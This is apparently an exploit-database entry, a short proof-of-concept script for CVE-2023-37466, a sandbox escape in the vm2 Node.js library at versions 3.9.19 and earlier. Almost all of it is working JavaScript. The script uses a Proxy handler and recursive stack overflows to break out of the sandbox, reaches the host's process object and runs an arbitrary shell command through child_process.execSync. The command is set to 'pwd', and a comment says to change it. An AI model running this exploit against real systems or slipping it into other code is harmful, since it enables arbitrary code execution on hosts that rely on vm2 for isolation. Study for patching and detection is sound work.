vm2 Sandbox Escape Vulnerability - CVE-2023-37466

1. /*
2. # Exploit Title: vm2 Sandbox Escape vulnerability
3. # Date: 23/12/2023
4. # Exploit Author: Calil Khalil & Adriel Mc Roberts
5. # Vendor Homepage: https://github.com/patriksimek/vm2
6. # Software Link: https://github.com/patriksimek/vm2
7. # Version: vm2 <= 3.9.19
8. # Tested on: Ubuntu 22.04
9. # CVE : CVE-2023-37466
10. */
11.  
12. const { VM } = require("vm2");
13. const vm = new VM();
14.  
15. const command = 'pwd'; // Change to the desired command
16.  
17. const code = `
18. async function fn() {
19.     (function stack() {
20.         new Error().stack;
21.         stack();
22.     })();
23. }
24.  
25. try {
26.     const handler = {
27.         getPrototypeOf(target) {
28.             (function stack() {
29.                 new Error().stack;
30.                 stack();
31.             })();
32.         }
33.     };
34.  
35.     const proxiedErr = new Proxy({}, handler);
36.  
37.     throw proxiedErr;
38. } catch ({ constructor: c }) {
39.     const childProcess = c.constructor('return process')().mainModule.require('child_process');
40.     childProcess.execSync('${command}');
41. }
42. `;
43.  
44. console.log(vm.run(code));
45.